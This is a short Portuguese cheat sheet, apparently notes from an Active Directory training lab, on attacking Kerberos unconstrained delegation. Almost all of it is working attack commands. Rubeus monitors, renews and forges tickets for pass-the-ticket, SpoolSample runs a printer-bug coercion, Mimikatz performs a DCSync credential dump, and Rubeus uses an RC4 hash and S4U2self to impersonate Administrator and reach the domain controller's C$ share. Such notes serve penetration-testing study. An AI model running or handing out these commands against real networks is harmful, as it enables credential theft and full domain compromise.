Unconstrained Delegation - Computers

Descrição

• Unconstrained Delegation era o único tipo de delegação disponível no Windows 2000.

• Quando um usuário solicita um ticket de serviço para um servidor com delegação irrestrita habilitada, o TGT do usuário é incluído no ticket de serviço.

• Isso permite que um atacante que comprometa esse servidor abuse desses tickets.

Enumeração

• Grupos e membros

Import-Module .\PowerView.ps1
Get-DomainGroup -MemberIdentity sarah.lafferty

Captura e Monitoramento de Tickets

• Monitorar tickets armazenados

.\Rubeus.exe monitor /interval:5 /nowrap

Abuso de Tickets

• Solicitar outro ticket com um TGT

.\Rubeus.exe asktgs /ticket:<TICKET> /service:cifs/dc01.INLANEFREIGHT.local /ptt

• Renovar ticket

.\Rubeus.exe renew /ticket:<TICKET> /ptt

• Usar ticket para acesso

dir \\dc01.inlanefreight.local\c$

Printer Bug (Spooler)

• Monitorar tickets em um terminal

.\Rubeus.exe monitor /interval:5 /nowrap

• Executar ataque de spooler em outro terminal

.\SpoolSample.exe dc01.inlanefreight.local sql01.inlanefreight.local

DCSync com Mimikatz

mimikatz.exe
lsadump::dcsync /user:sarah.lafferty

Rubeus – Solicitação de TGT direto

• Solicitar TGT com hash RC4 de Sarah

.\Rubeus.exe asktgt /rc4:0fcb586d2aec31967c8a310d1ac2bf50 /user:sarah.lafferty /ptt

Acesso ao DC com ticket de Sarah

dir \\dc01.inlanefreight.local\c$

S4U2self / Impersonação

• Impersonar Administrator com S4U2self

.\Rubeus.exe s4u /self /nowrap /impersonateuser:Administrator /altservice:CIFS/dc01.inlanefreight.local /ptt /ticket:<TICKET>

• Usar acesso

ls \\dc01.inlanefreight.local\c$